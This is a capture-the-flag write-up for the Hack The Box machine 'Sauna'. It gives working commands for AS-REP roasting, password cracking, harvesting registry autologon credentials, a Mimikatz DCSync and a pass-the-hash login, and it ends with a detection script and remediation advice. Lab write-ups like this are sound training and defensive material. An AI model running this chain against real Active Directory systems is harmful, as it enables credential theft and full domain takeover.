Hack The Box — Sauna

Prasad Panchbhai
5 min read · Jul 19, 2020

Overview

Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Initial enumeration exposes some employee names from which we can build a username list. Using GetNPUsers.py we identify a valid user and obtain its hash; with the cracked password we use evil-winrm to get a shell as that user. Enumerating the registry reveals a password for a service account, which gives us a shell as that service account. svc_loanmgr has the permissions needed to DCSync, so we use Mimikatz to dump the Administrator credentials and evil-winrm to get a shell as Administrator.

Enumeration

Nmap

Like all machines, we begin by enumerating all open services. Doing so, we get a ton of results.

nmap -sC -sV -v -oA nmap/sauna 10.10.10.175

Nmap scan report for 10.10.10.175
Host is up (0.16s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-18 18:54:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/18%Time=5F12E1B1%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h05m07s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-19T00:11:36
|_ start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Initiating NSE at 13:54
Completed NSE at 13:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 323.91 seconds

The first ports that immediately jumped out at me were 80, 88, and 389. I decided to turn my reconnaissance towards these ports. Port 80 told me that it was running a Microsoft IIS web server. Port 88 showed that it was using Kerberos for authentication to the server. Port 389 identified the system as a Domain Controller.

Let’s proceed to examine the website.

Web

Navigating to the website in a browser reveals a website for a bank. The Wappalyzer add-on doesn’t identify any vulnerable technologies.

Just scrolling around, nothing interesting jumps out. All the pages are static, and the forms don’t work. There isn’t much of value here. On the “About Us” page, however, there’s a list of the team members.

Using the names above, I created a list of candidate usernames.

Kerberoasting

User

Using that list, I ran GetNPUsers.py to look for a valid user and retrieve its hash:

python GetNPUsers.py EGOTISTICALBANK/ -usersfile user.txt -format john -dc-ip 10.10.10.175

We get a hit on fsmith, whose account is vulnerable to AS-REP roasting, along with a hash for that account. Using john to crack the password:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 

which gives us valid credentials: fsmith:Thestrokes23

Evil-WinRM

With the gained credentials fsmith / Thestrokes23 we can try to log in using WinRM. Windows Remote Management (WinRM) is a Windows-native, built-in remote management protocol, and it is often enabled for users that need to manage systems remotely. We can use evil-winrm to connect to the remote system.

./evil-winrm.rb -u fsmith -p Thestrokes23 -i 10.10.10.175

The user flag is located in C:\Users\Fsmith\Desktop\

Privilege Escalation

Enumerating users with net user to look for any other accounts, we find another user: svc_loanmgr.

The command net user svc_loanmgr reveals that this user is also part of the Remote Management Users group.

Looking for a password for that user, I queried the Winlogon registry key for a DefaultPassword (stored autologon credentials):

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

The registry key contains the username (svc_loanmanager) and password (Moneymakestheworldgoround!) for this autologon.

Use evil-winrm again to login as this new user.

Hash

Mimikatz

I used Mimikatz: download the latest release from the release page and upload the 64-bit binary to Sauna.

Running ./mimikatz.exe "lsadump::dcsync /user:administrator" "exit" performs a DCSync against the domain controller and obtains the domain Administrator's credentials.

Mimikatz returns the NTLM hash for the user Administrator, which we can use to log in without needing the user's password. The NTLM hash:

d9485863c1e9e05851aa40cbb4ab9dff

Then use ./evil-winrm.rb -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175 to log in to the target host successfully.

The root flag is located in C:\Users\Administrator\Desktop\

And we successfully root the box!
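Both footholds in this write-up leave distinctive traces on the domain controller: the AS-REP roast of fsmith shows up as a Kerberos TGT request (event 4768) with no pre-authentication, and the DCSync by svc_loanmgr shows up as an object access (event 4662) exercising the directory replication control-access rights from an account that is not a domain controller. The following detection script is an added example, not part of the original write-up or any tool it uses; the event IDs and replication GUIDs are well-known Windows values, while the flattened key=value event lines and the SAUNA$ allow-list are constructed assumptions for this lab.

```python
import re

# Well-known Windows values (not from the write-up): 4768 = Kerberos TGT request,
# 4662 = operation performed on an AD object; the three replication control-access GUIDs.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Accounts expected to replicate: the DCs' machine accounts (assumption for this lab).
REPLICATION_ALLOWED = {"SAUNA$"}

# Constructed sample events flattened to key=value pairs; not real exported logs.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=fsmith PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5",
    "EventID=4768 TargetUserName=hsmith PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.14.5",
    "EventID=4662 SubjectUserName=svc_loanmgr Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} ObjectType=domainDNS",
    "EventID=4662 SubjectUserName=SAUNA$ Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} ObjectType=domainDNS",
]

def parse_event(line):
    """Split one flattened event line into a dict of its fields."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def classify(event):
    """Return an alert string for the two abuses in the write-up, or None if benign."""
    eid = event.get("EventID")
    if eid == "4768" and event.get("PreAuthType") == "0":
        # TGT issued with no pre-authentication: exactly what GetNPUsers.py requests.
        # RC4 (0x17) is what makes the AS-REP crackable offline with john.
        enc = event.get("TicketEncryptionType", "")
        return f"asrep-roast:{event['TargetUserName']}:{enc}"
    if eid == "4662":
        guids = {g.strip("{}").lower() for g in event.get("Properties", "").split(",")}
        # Replication rights exercised by a non-DC account: DCSync, as svc_loanmgr did.
        if guids & REPLICATION_GUIDS and event.get("SubjectUserName") not in REPLICATION_ALLOWED:
            return f"dcsync:{event['SubjectUserName']}"
    return None

def scan(lines):
    """Run every line through classify() and keep only the alerts."""
    return [alert for alert in map(classify, map(parse_event, lines)) if alert]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The durable fixes are the ones the alerts point at: re-enable Kerberos pre-authentication on fsmith, and remove the replication rights from svc_loanmgr so only domain controllers can DCSync.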

Thank you for taking the time to read my write-up. I am interested in other ways this machine has been solved. Feel free to reach out to me and we can discuss it. Thanks!
